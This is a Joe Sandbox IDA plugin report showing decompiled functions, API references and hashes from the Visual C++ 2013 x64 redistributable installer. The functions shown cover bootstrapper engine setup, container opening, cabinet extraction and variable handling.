Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: _memset
String ID: Failed to extract bootstrapper application payloads.$Failed to get manifest stream from container.$Failed to get unique temporary folder for bootstrapper application.$Failed to initialize variables.$Failed to load catalog files.$Failed to load manifest.$Failed to open attached UX container.$Failed to open manifest stream.$Failed to overwrite the %ls built-in variable.$Failed to parse command line.$Failed to set original source variable.$WixBundleElevated$WixBundleOriginalSource
API String ID: 2102423945-1257586656
Opcode ID: 43ef623e74b9ce7c22e547ca27c93dfe6754889c46d2bc258b655946d9fd083d
Instruction ID: 57b9d73d3306003416c6219e2fdcb7ee176ba2a65708d0d58f0c9e2f2b2e50b8
Opcode Fuzzy Hash: 43ef623e74b9ce7c22e547ca27c93dfe6754889c46d2bc258b655946d9fd083d
Instruction Fuzzy Hash: E661A17357170AAACB12EAE5CC81EEF77BDAB44610F10452AF21EE3181EE70E6098750

Uniqueness

Uniqueness Score: -1.00%

Function 0128157C Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 147
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0128157C(void* __ecx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				signed int _t34;
				long _t35;
				signed int _t36;
				signed int _t37;
				signed int _t50;
				signed int _t59;
				signed int _t62;
				signed int _t67;
				signed int _t76;
				void* _t78;

				_t78 = __esi;
				_t73 = __edx;
				_t71 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_push(_t68);
				if( *((intOrPtr*)(__esi + 0x488)) != 2) {
					L5:
					_t34 = E012838B6(_t68, _t71, _t78 + 0x494, 1); // executed
					__eflags = _t34;
					if(_t34 >= 0) {
						_t35 = TlsAlloc();
						 *(_t78 + 0x48c) = _t35;
						__eflags = _t35 - 0xffffffff;
						if(_t35 != 0xffffffff) {
							_t36 = TlsSetValue(_t35,  *(_t78 + 0x4a4));
							__eflags = _t36;
							if(_t36 != 0) {
								_t37 = E0129152B(_a4, _t78); // executed
								_t76 = _t37;
								__eflags = _t76;
								if(__eflags >= 0) {
									E012B2FFF(_t73, __eflags, 1); // executed
									E012AF0E3(E0128131F, _t78);
									_t50 = E01291133( *(_t78 + 0x48c),  *(_t78 + 0x4a4),  *((intOrPtr*)(_t78 + 0x4a8)), _t78 + 0x2a0, _t78 + 0x2b8, _t78 + 0x2b0, _t78 + 0x88, _t78 + 0xf8, _t78 + 0xb8,  &_v8,  &_v12, _t78 + 0xf4, _t78 + 0x18); // executed
									_t76 = _t50;
									E012AF0E3(0, 0);
									__eflags = _t76;
									if(_t76 < 0) {
										_push("Failed to pump messages from parent process.");
										goto L23;
									}
								} else {
									_push("Failed to create the message window.");
									goto L23;
								}
							} else {
								_t59 = GetLastError();
								__eflags = _t59;
								if(_t59 > 0) {
									_t59 = _t59 & 0x0000ffff | 0x80070000;
									__eflags = _t59;
								}
								_t76 = _t59;
								__eflags = _t76;
								if(_t76 >= 0) {
									_t76 = 0x80004005;
								}
								E012B294E(_t59, "engine.cpp", 0x1cb, _t76);
								_push("Failed to set elevated pipe into thread local storage for logging.");
								goto L23;
							}
						} else {
							_t62 = GetLastError();
							__eflags = _t62;
							if(_t62 > 0) {
								_t62 = _t62 & 0x0000ffff | 0x80070000;
								__eflags = _t62;
							}
							_t76 = _t62;
							__eflags = _t76;
							if(_t76 >= 0) {
								_t76 = 0x80004005;
							}
							E012B294E(_t62, "engine.cpp", 0x1c6, _t76);
							_push("Failed to allocate thread local storage for logging.");
							goto L23;
						}
					} else {
						_push("Failed to connect to unelevated process.");
						goto L23;
					}
				} else {
					_t68 = __esi + 0x498;
					_t76 = E012828DB(__edx, __esi + 0x494, __esi + 0x498);
					if(_t76 >= 0) {
						_push( *((intOrPtr*)(__esi + 0x4c8)));
						_t67 = E01282A19(_a8,  *((intOrPtr*)(__esi + 0x2c)),  *((intOrPtr*)(__esi + 0x494)),  *_t68); // executed
						_t76 = _t67;
						__eflags = _t76;
						if(_t76 >= 0) {
							goto L5;
						} else {
							_push("Failed to launch unelevated process.");
							goto L23;
						}
					} else {
						_push("Failed to create implicit elevated connection name and secret.");
						L23:
						E012AFA86();
						_t71 = _t76;
					}
				}
				E012AF0E3(0, 0);
				E01291256(_t78); // executed
				_t81 = _v12;
				if(_v12 != 0) {
					E0128E886(_t71, _t81);
				}
				if(_v8 != 0) {
					ReleaseMutex(_v8);
					CloseHandle(_v8);
				}
				return _t76;
			}

0x0128157c
0x0128157c
0x0128157c
0x0128157f
0x01281580
0x01281581
0x01281585
0x01281590
0x01281592
0x012815e0
0x012815e9
0x012815f0
0x012815f2
0x012815fe
0x01281604
0x0128160a
0x0128160d
0x0128164f
0x01281655
0x01281657
0x01281696
0x0128169b
0x0128169d
0x0128169f
0x012816aa
0x012816b5
0x01281709
0x01281712
0x01281714
0x01281719
0x0128171b
0x0128171d
0x00000000
0x0128171d
0x012816a1
0x012816a1
0x00000000
0x012816a1
0x01281659
0x01281659
0x0128165f
0x01281661
0x01281668
0x01281668
0x01281668
0x0128166d
0x0128166f
0x01281671
0x01281673
0x01281673
0x01281683
0x01281688
0x00000000
0x01281688
0x0128160f
0x0128160f
0x01281615
0x01281617
0x0128161e
0x0128161e
0x0128161e
0x01281623
0x01281625
0x01281627
0x01281629
0x01281629
0x01281639
0x0128163e
0x00000000
0x0128163e
0x012815f4
0x012815f4
0x00000000
0x012815f4
0x01281594
0x01281594
0x012815a7
0x012815ab
0x012815b7
0x012815cb
0x012815d0
0x012815d2
0x012815d4
0x00000000
0x012815d6
0x012815d6
0x00000000
0x012815d6
0x012815ad
0x012815ad
0x01281722
0x01281723
0x01281729
0x01281729
0x012815ab
0x0128172e
0x01281734
0x01281739
0x0128173c
0x0128173e
0x0128173e
0x01281746
0x0128174b
0x01281754
0x01281754
0x0128175f

APIs

ReleaseMutex.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 0128174B
CloseHandle.KERNEL32(00000000,?,?,?,01281DEA,?,?), ref: 01281754

Part of subcall function 012828DB: UuidCreate.RPCRT4(?), ref: 01282912
Part of subcall function 012828DB: StringFromGUID2.OLE32(?,?,00000027), ref: 01282925

Strings

Failed to launch unelevated process., xrefs: 012815D6
Failed to allocate thread local storage for logging., xrefs: 0128163E
Failed to create the message window., xrefs: 012816A1
Failed to set elevated pipe into thread local storage for logging., xrefs: 01281688
Failed to connect to unelevated process., xrefs: 012815F4
Failed to create implicit elevated connection name and secret., xrefs: 012815AD
Failed to pump messages from parent process., xrefs: 0128171D
engine.cpp, xrefs: 01281634, 0128167E

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CloseCreateFromHandleMutexReleaseStringUuid
String ID: Failed to allocate thread local storage for logging.$Failed to connect to unelevated process.$Failed to create implicit elevated connection name and secret.$Failed to create the message window.$Failed to launch unelevated process.$Failed to pump messages from parent process.$Failed to set elevated pipe into thread local storage for logging.$engine.cpp
API String ID: 3991521885-93479633
Opcode ID: c2cd384c59611283063223bfaf7e5a87be58b39474f1e066f53f4afb92305936
Instruction ID: b1bae97ae54f2ac8ebee0801242258cabd5389cb54760c4400f69db252735675
Opcode Fuzzy Hash: c2cd384c59611283063223bfaf7e5a87be58b39474f1e066f53f4afb92305936
Instruction Fuzzy Hash: 344113725A1706BFDB22BAA0CC85FEB76ADEF44390F14442DF25A931C0EB74E5128720

Uniqueness

Uniqueness Score: -1.00%

Function 012A0431 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E012A0431(void* __edx, HANDLE* _a4, intOrPtr _a8, void* _a12, WCHAR* _a16) {
				struct _SECURITY_ATTRIBUTES* _v8;
				union _LARGE_INTEGER* _v12;
				union _LARGE_INTEGER _v16;
				void* _t46;
				int _t48;
				union _LARGE_INTEGER* _t49;
				int _t50;
				struct _SECURITY_ATTRIBUTES* _t54;
				signed int _t56;
				signed int _t59;
				void* _t63;
				signed int _t64;
				long _t67;
				union _LARGE_INTEGER _t69;
				void* _t72;
				intOrPtr _t74;
				HANDLE* _t75;

				_t72 = __edx;
				_t75 = _a4;
				asm("stosd");
				asm("stosd");
				_t74 = _a8;
				_t4 = _t74 + 4; // 0xe9595900
				_t75[6] =  *_t4;
				_t6 = _t74 + 0x18; // 0x6805
				_t75[4] =  *_t6;
				_t8 = _t74 + 0x1c; // 0xb5ff8000
				_t75[5] =  *_t8;
				_t10 = _t74 + 0x40; // 0x700000d
				_t67 = 0;
				_t75[2] =  *_t10;
				_t13 = _t74 + 0x44; // 0x85f08b80
				_v8 = 0;
				_t75[3] =  *_t13;
				if(_a12 != 0xffffffff) {
					_t46 = GetCurrentProcess();
					_t48 = DuplicateHandle(GetCurrentProcess(), _a12, _t46, _t75, 0, 0, 2); // executed
					if(_t48 != 0) {
						_t67 = 0;
						goto L15;
					} else {
						_t59 = GetLastError();
						if(_t59 > 0) {
							_t59 = _t59 & 0x0000ffff | 0x80070000;
						}
						_v8 = _t59;
						if(_t59 >= 0) {
							_v8 = 0x80004005;
						}
						E012B294E(_t59, "container.cpp", 0xe4, _v8);
						_push(_a16);
						_push("Failed to duplicate handle to container: %ls");
						goto L13;
					}
				} else {
					_t63 = CreateFileW(_a16, 0x80000000, 1, 0, 3, 0x8000080, 0);
					 *_t75 = _t63;
					if(_t63 != 0xffffffff) {
						L15:
						if( *((intOrPtr*)(_t74 + 0xc)) == _t67) {
							_t49 = _v12;
							_t69 = _v16;
						} else {
							_t28 =  &(_t75[2]); // 0xbf177448
							_t69 =  *_t28;
							_t29 =  &(_t75[3]); // 0x8000ffff
							_t49 =  *_t29;
						}
						_push(_t67);
						_t50 = SetFilePointerEx( *_t75, _t69, _t49, _t67); // executed
						if(_t50 != 0) {
							_t35 =  &(_t75[6]); // 0x590002dc
							if( *_t35 == 1) {
								_t54 = E012A6477(_t69, _t72, _t75, _a16); // executed
								_v8 = _t54;
								if(_t54 < _t67) {
									_push("Failed to open container.");
									goto L27;
								}
							}
						} else {
							_t56 = GetLastError();
							if(_t56 > _t67) {
								_t56 = _t56 & 0x0000ffff | 0x80070000;
							}
							_v8 = _t56;
							if(_t56 >= _t67) {
								_v8 = 0x80004005;
							}
							E012B294E(_t56, "container.cpp", 0xf0, _v8);
							_push("Failed to move file pointer to container offset.");
							L27:
							_push(_v8);
							E012AFA86();
						}
					} else {
						_t64 = GetLastError();
						if(_t64 > 0) {
							_t64 = _t64 & 0x0000ffff | 0x80070000;
						}
						_v8 = _t64;
						if(_t64 >= _t67) {
							_v8 = 0x80004005;
						}
						E012B294E(_t64, "container.cpp", 0xde, _v8);
						_push(_a16);
						_push("Failed to open file: %ls");
						L13:
						_push(_v8);
						E012AFA86();
					}
				}
				return _v8;
			}

0x012a0431
0x012a043b
0x012a0442
0x012a0443
0x012a0444
0x012a0447
0x012a044a
0x012a044d
0x012a0450
0x012a0453
0x012a0456
0x012a0459
0x012a045c
0x012a0462
0x012a0465
0x012a0468
0x012a046b
0x012a046e
0x012a04dd
0x012a04e6
0x012a04ee
0x012a053c
0x00000000
0x012a04f0
0x012a04f0
0x012a04f8
0x012a04ff
0x012a04ff
0x012a0504
0x012a0509
0x012a050b
0x012a050b
0x012a051f
0x012a0524
0x012a0527
0x00000000
0x012a0527
0x012a0470
0x012a0483
0x012a0489
0x012a048e
0x012a053e
0x012a0541
0x012a054b
0x012a054e
0x012a0543
0x012a0543
0x012a0543
0x012a0546
0x012a0546
0x012a0546
0x012a0551
0x012a0557
0x012a055f
0x012a059c
0x012a05a0
0x012a05a6
0x012a05ab
0x012a05b0
0x012a05b2
0x00000000
0x012a05b2
0x012a05b0
0x012a0561
0x012a0561
0x012a0569
0x012a0570
0x012a0570
0x012a0575
0x012a057a
0x012a057c
0x012a057c
0x012a0590
0x012a0595
0x012a05b7
0x012a05b7
0x012a05ba
0x012a05c0
0x012a0494
0x012a0494
0x012a049c
0x012a04a3
0x012a04a3
0x012a04a8
0x012a04ad
0x012a04af
0x012a04af
0x012a04c3
0x012a04c8
0x012a04cb
0x012a052c
0x012a052c
0x012a052f
0x012a0534
0x012a048e
0x012a05c8

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,00000000,00000000), ref: 012A0483
GetLastError.KERNEL32 ref: 012A0494
GetCurrentProcess.KERNEL32(01281D72,00000000,00000000,00000002,00000000,00000000), ref: 012A04DD
GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 012A04E3
DuplicateHandle.KERNELBASE(00000000), ref: 012A04E6
GetLastError.KERNEL32 ref: 012A04F0
SetFilePointerEx.KERNELBASE(01281D72,01282142,01281D72,00000000,00000000), ref: 012A0557
GetLastError.KERNEL32 ref: 012A0561

Strings

container.cpp, xrefs: 012A04BE, 012A051A, 012A058B
Failed to duplicate handle to container: %ls, xrefs: 012A0527
Failed to open container., xrefs: 012A05B2
Failed to move file pointer to container offset., xrefs: 012A0595
Failed to open file: %ls, xrefs: 012A04CB

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp
API String ID: 2619879409-2168299741
Opcode ID: 4c0798cea7103d65e6a5fff55db0ef990c8ee27c3cd6b92e03659730e254e259
Instruction ID: 586ae2628f36bc382bf6fcda88e11ac6a63f06ac40d84fca15ef1464d5b1c231
Opcode Fuzzy Hash: 4c0798cea7103d65e6a5fff55db0ef990c8ee27c3cd6b92e03659730e254e259
Instruction Fuzzy Hash: DF41AEB1A2060AFFDB20DF68ED85A6EBBB5FF08340F504528F681E6250D375EA109B55

Uniqueness

Uniqueness Score: -1.00%

Function 012A5D1C Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 106
fileCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E012A5D1C(void* __ecx, CHAR* _a4) {
				void* _v8;
				void* __esi;
				signed int _t17;
				long _t19;
				signed int _t20;
				void* _t23;
				void* _t27;
				int _t29;
				signed int _t30;
				void** _t41;
				void* _t44;

				_push(__ecx);
				_t37 =  *[fs:0x2c];
				_t17 =  *0x12d4fd4; // 0x0
				_v8 = _v8 | 0xffffffff;
				_t41 =  *( *((intOrPtr*)( *[fs:0x2c] + _t17 * 4)) + 4);
				_t44 = 0; // executed
				_t19 = CompareStringA(0, 0, "<the>.cab", 0xffffffff, _a4, 0xffffffff); // executed
				if(_t19 != 2) {
					_t20 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x8000080, 0);
					_v8 = _t20;
					__eflags = _t20 - 0xffffffff;
					if(_t20 == 0xffffffff) {
						_t23 = GetLastError();
						__eflags = _t23;
						if(_t23 > 0) {
							_t23 = _t23 & 0x0000ffff | 0x80070000;
							__eflags = _t23;
						}
						_t44 = _t23;
						__eflags = _t44;
						if(_t44 >= 0) {
							_t44 = 0x80004005;
						}
						E012B294E(_t23, "cabextract.cpp", 0x2b4, _t44);
						_t20 = E012AFA86(_t44, "Failed to open cabinet file: %hs", _a4);
					}
					L16:
					_t41[0xc] = _t44;
					if(_t44 >= 0) {
						return _v8;
					} else {
						return _t20 | 0xffffffff;
					}
				}
				_t27 = GetCurrentProcess();
				_t29 = DuplicateHandle(GetCurrentProcess(),  *_t41, _t27,  &_v8, 0, 0, _t19); // executed
				if(_t29 != 0) {
					_t20 = E012A5A2C(_t37,  &(_t41[7]), __eflags, _v8, _t41[2], _t41[3]);
					_t44 = _t20;
					__eflags = _t44;
					if(_t44 >= 0) {
						goto L16;
					}
					_push("Failed to add virtual file pointer for cab container.");
					L9:
					_push(_t44);
					_t20 = E012AFA86();
					goto L16;
				}
				_t30 = GetLastError();
				if(_t30 > 0) {
					_t30 = _t30 & 0x0000ffff | 0x80070000;
				}
				_t44 = _t30;
				if(_t44 >= 0) {
					_t44 = 0x80004005;
				}
				E012B294E(_t30, "cabextract.cpp", 0x2a9, _t44);
				_push("Failed to duplicate handle to cab container.");
				goto L9;
			}

0x012a5d1f
0x012a5d20
0x012a5d27
0x012a5d2f
0x012a5d36
0x012a5d4c
0x012a5d4e
0x012a5d57
0x012a5de7
0x012a5ded
0x012a5df0
0x012a5df3
0x012a5df5
0x012a5dfb
0x012a5dfd
0x012a5e04
0x012a5e04
0x012a5e04
0x012a5e09
0x012a5e0b
0x012a5e0d
0x012a5e0f
0x012a5e0f
0x012a5e1f
0x012a5e2d
0x012a5e32
0x012a5e35
0x012a5e35
0x012a5e3d
0x012a5e48
0x012a5e3f
0x012a5e43
0x012a5e43
0x012a5e3d
0x012a5d66
0x012a5d6e
0x012a5d76
0x012a5dba
0x012a5dbf
0x012a5dc1
0x012a5dc3
0x00000000
0x00000000
0x012a5dc5
0x012a5dca
0x012a5dca
0x012a5dcb
0x00000000
0x012a5dd1
0x012a5d78
0x012a5d80
0x012a5d87
0x012a5d87
0x012a5d8c
0x012a5d90
0x012a5d92
0x012a5d92
0x012a5da2
0x012a5da7
0x00000000

APIs

CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,000000FF,?,000000FF), ref: 012A5D4E
GetCurrentProcess.KERNEL32(000000FF,00000000,00000000,00000000), ref: 012A5D66
GetCurrentProcess.KERNEL32(?,00000000), ref: 012A5D6B
DuplicateHandle.KERNELBASE(00000000), ref: 012A5D6E
GetLastError.KERNEL32 ref: 012A5D78
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000), ref: 012A5DE7
GetLastError.KERNEL32 ref: 012A5DF5

Strings

<the>.cab, xrefs: 012A5D45
Failed to duplicate handle to cab container., xrefs: 012A5DA7
Failed to open cabinet file: %hs, xrefs: 012A5E27
cabextract.cpp, xrefs: 012A5D9D, 012A5E1A
Failed to add virtual file pointer for cab container., xrefs: 012A5DC5

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
API String ID: 3030546534-3446344238
Opcode ID: 14fce2423741390f496961d11d81dff20fb21ec974f5433d4bde464a663c7727
Instruction ID: 6bc6faf090b9c1c20922c506dbd36cb855986e29ba897215796e7f812dca87d6
Opcode Fuzzy Hash: 14fce2423741390f496961d11d81dff20fb21ec974f5433d4bde464a663c7727
Instruction Fuzzy Hash: 1C31E472A20517BBDB206A649D8DEAA7B68EB147B4F600328F724F7190D3759D018BD0

Uniqueness

Uniqueness Score: -1.00%

Function 012A6477 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 105
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E012A6477(void* __ecx, void* __edx, void* _a4, intOrPtr _a8) {
				void* __esi;
				void* _t11;
				void* _t12;
				void* _t13;
				signed int _t17;
				signed int _t20;
				signed int _t23;
				signed int _t32;
				void* _t35;

				_t35 = _a4;
				 *(_t35 + 0x3c) =  *(_t35 + 0x3c) | 0xffffffff;
				_t32 = E012B1171(__ecx, __edx, _t35 + 0x1c, _a8, 0);
				if(_t32 >= 0) {
					_t11 = CreateEventW(0, 1, 0, 0);
					 *(_t35 + 0x24) = _t11;
					if(_t11 != 0) {
						_t12 = CreateEventW(0, 1, 0, 0);
						 *(_t35 + 0x28) = _t12;
						if(_t12 != 0) {
							_t13 = CreateThread(0, 0, E012A6231, _t35, 0, 0); // executed
							 *(_t35 + 0x20) = _t13;
							if(_t13 != 0) {
								_t32 = E012A5BB3(_t35);
								if(_t32 < 0) {
									_push("Failed to wait for operation complete.");
									goto L22;
								}
							} else {
								_t17 = GetLastError();
								if(_t17 > 0) {
									_t17 = _t17 & 0x0000ffff | 0x80070000;
								}
								_t32 = _t17;
								if(_t32 >= 0) {
									_t32 = 0x80004005;
								}
								E012B294E(_t17, "cabextract.cpp", 0x9b, _t32);
								_push("Failed to create extraction thread.");
								goto L22;
							}
						} else {
							_t20 = GetLastError();
							if(_t20 > 0) {
								_t20 = _t20 & 0x0000ffff | 0x80070000;
							}
							_t32 = _t20;
							if(_t32 >= 0) {
								_t32 = 0x80004005;
							}
							E012B294E(_t20, "cabextract.cpp", 0x97, _t32);
							_push("Failed to create operation complete event.");
							goto L22;
						}
					} else {
						_t23 = GetLastError();
						if(_t23 > 0) {
							_t23 = _t23 & 0x0000ffff | 0x80070000;
						}
						_t32 = _t23;
						if(_t32 >= 0) {
							_t32 = 0x80004005;
						}
						E012B294E(_t23, "cabextract.cpp", 0x94, _t32);
						_push("Failed to create begin operation event.");
						goto L22;
					}
				} else {
					_push("Failed to copy file name.");
					L22:
					_push(_t32);
					E012AFA86();
				}
				return _t32;
			}

0x012a647c
0x012a647f
0x012a6493
0x012a6497
0x012a64ae
0x012a64b0
0x012a64b5
0x012a64f5
0x012a64f7
0x012a64fc
0x012a653e
0x012a6544
0x012a6549
0x012a6586
0x012a658a
0x012a658c
0x00000000
0x012a658c
0x012a654b
0x012a654b
0x012a6553
0x012a655a
0x012a655a
0x012a655f
0x012a6563
0x012a6565
0x012a6565
0x012a6575
0x012a657a
0x00000000
0x012a657a
0x012a64fe
0x012a64fe
0x012a6506
0x012a650d
0x012a650d
0x012a6512
0x012a6516
0x012a6518
0x012a6518
0x012a6528
0x012a652d
0x00000000
0x012a652d
0x012a64b7
0x012a64b7
0x012a64bf
0x012a64c6
0x012a64c6
0x012a64cb
0x012a64cf
0x012a64d1
0x012a64d1
0x012a64e1
0x012a64e6
0x00000000
0x012a64e6
0x012a6499
0x012a6499
0x012a6591
0x012a6591
0x012a6592
0x012a6598
0x012a659f

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,01281D72,00000000,01282142,01281D72,00000000,?,012A05AB,01281D72,?), ref: 012A64AE
GetLastError.KERNEL32(?,012A05AB,01281D72,?), ref: 012A64B7

Strings

Failed to create begin operation event., xrefs: 012A64E6
Failed to copy file name., xrefs: 012A6499
Failed to create operation complete event., xrefs: 012A652D
cabextract.cpp, xrefs: 012A64DC, 012A6523, 012A6570
Failed to wait for operation complete., xrefs: 012A658C
Failed to create extraction thread., xrefs: 012A657A

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CreateErrorEventLast
String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp
API String ID: 545576003-1680384675
Opcode ID: f2f2aff1b5cc32d156ed80142201202b25ca2d1b199cd703d2809e7766d1200c
Instruction ID: 2dd2bff716850e7d536b77db207ef9b8a042c455a809838f15f5200a40240aa1
Opcode Fuzzy Hash: f2f2aff1b5cc32d156ed80142201202b25ca2d1b199cd703d2809e7766d1200c
Instruction Fuzzy Hash: 9B21E5B227030B7BD7302965ACC9A3A369AAB54BA4B6D093CF385E7144DAB998010760

Uniqueness

Uniqueness Score: -1.00%

Function 01289C0E Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E01289C0E(signed int __eax, signed int __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _t35;
				intOrPtr _t43;
				intOrPtr _t46;
				signed int _t49;
				intOrPtr _t51;
				intOrPtr _t52;
				signed int _t59;
				signed int _t68;
				signed int _t69;
				signed int _t73;
				signed int* _t76;
				signed int _t81;
				intOrPtr _t83;
				void* _t84;

				_t63 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_v12 = _v12 & 0x00000000;
				_t81 = __ecx;
				_t76 = __ecx + 0x18;
				_t59 = __eax;
				_t32 =  *_t76;
				if( *((intOrPtr*)(__ecx + 0x1c)) !=  *_t76) {
					L12:
					_t34 =  *(_t81 + 0x1c) != _t59;
					if( *(_t81 + 0x1c) != _t59) {
						_t79 = _t59 * 0x30;
						_t63 =  *((intOrPtr*)(_t81 + 0x20)) + _t59 * 0x30 + 0x30;
						E012A8310( *((intOrPtr*)(_t81 + 0x20)) + _t59 * 0x30 + 0x30,  *((intOrPtr*)(_t81 + 0x20)) + _t59 * 0x30, _t34 * 0x30);
						E012A7E30( *((intOrPtr*)(_t81 + 0x20)) + _t79, 0, 0x30);
					}
					 *(_t81 + 0x1c) =  *(_t81 + 0x1c) + 1;
					_t35 = E012B1171(_t63, _t71, _t59 * 0x30 +  *((intOrPtr*)(_t81 + 0x20)), _a4, 0);
					_v8 = _t35;
					if(_t35 < 0) {
						_push("Failed to copy variable name.");
						goto L16;
					}
				} else {
					_t43 = E012B04C2(_t32, 3, _t76);
					_v8 = _t43;
					if(_t43 >= 0) {
						if( *((intOrPtr*)(_t81 + 0x20)) == 0) {
							_t46 = E012B233B( *_t76 * 0x30, 1);
							 *((intOrPtr*)(_t81 + 0x20)) = _t46;
							if(_t46 != 0) {
								goto L12;
							} else {
								_t83 = 0x8007000e;
								_v8 = 0x8007000e;
								E012B294E(_t46, "variable.cpp", 0x4f0, 0x8007000e);
								_push("Failed to allocate room for variables.");
								goto L8;
							}
						} else {
							_push( &_v12);
							_t49 =  *_t76;
							_t68 = 0x30;
							_push(_t49 * _t68 >> 0x20);
							_push(_t49 * _t68);
							_t51 = E012B239B();
							_v8 = _t51;
							if(_t51 >= 0) {
								_t52 = E012B235D( *((intOrPtr*)(_t81 + 0x20)), _v12, 0); // executed
								if(_t52 != 0) {
									_t69 =  *_t76;
									_t73 =  *(_t81 + 0x1c);
									if(_t69 >= _t73) {
										_t63 = (_t69 - _t73) * 0x30;
										_t71 = _t73 * 0x30 + _t52;
										 *((intOrPtr*)(_t81 + 0x20)) = _t52;
										E012A7E30(_t73 * 0x30 + _t52, 0, (_t69 - _t73) * 0x30);
										_t84 = _t84 + 0xc;
										goto L12;
									} else {
										_t83 = 0x80070216;
										_v8 = 0x80070216;
										E012B294E(_t52, "variable.cpp", 0x4e7, 0x80070216);
										_push("Overflow while dealing with variable array buffer allocation");
										goto L8;
									}
								} else {
									_t83 = 0x8007000e;
									_v8 = 0x8007000e;
									E012B294E(_t52, "variable.cpp", 0x4e1, 0x8007000e);
									_push("Failed to allocate room for more variables.");
									L8:
									_push(_t83);
									goto L17;
								}
							} else {
								E012B294E(_t51, "variable.cpp", 0x4de, _t51);
								_push("Overflow while calculating size of variable array buffer");
								goto L16;
							}
						}
					} else {
						E012B294E(_t43, "variable.cpp", 0x4d9, _t43);
						_push("Overflow while growing variable array size");
						L16:
						_push(_v8);
						L17:
						E012AFA86();
					}
				}
				return _v8;
			}

0x01289c0e
0x01289c11
0x01289c12
0x01289c13
0x01289c19
0x01289c1c
0x01289c1f
0x01289c21
0x01289c26
0x01289d08
0x01289d0b
0x01289d0d
0x01289d17
0x01289d1e
0x01289d22
0x01289d31
0x01289d36
0x01289d39
0x01289d48
0x01289d4d
0x01289d52
0x01289d54
0x00000000
0x01289d54
0x01289c2c
0x01289c30
0x01289c35
0x01289c3a
0x01289c5a
0x01289d75
0x01289d7a
0x01289d7f
0x00000000
0x01289d81
0x01289d81
0x01289d91
0x01289d94
0x01289d99
0x00000000
0x01289d99
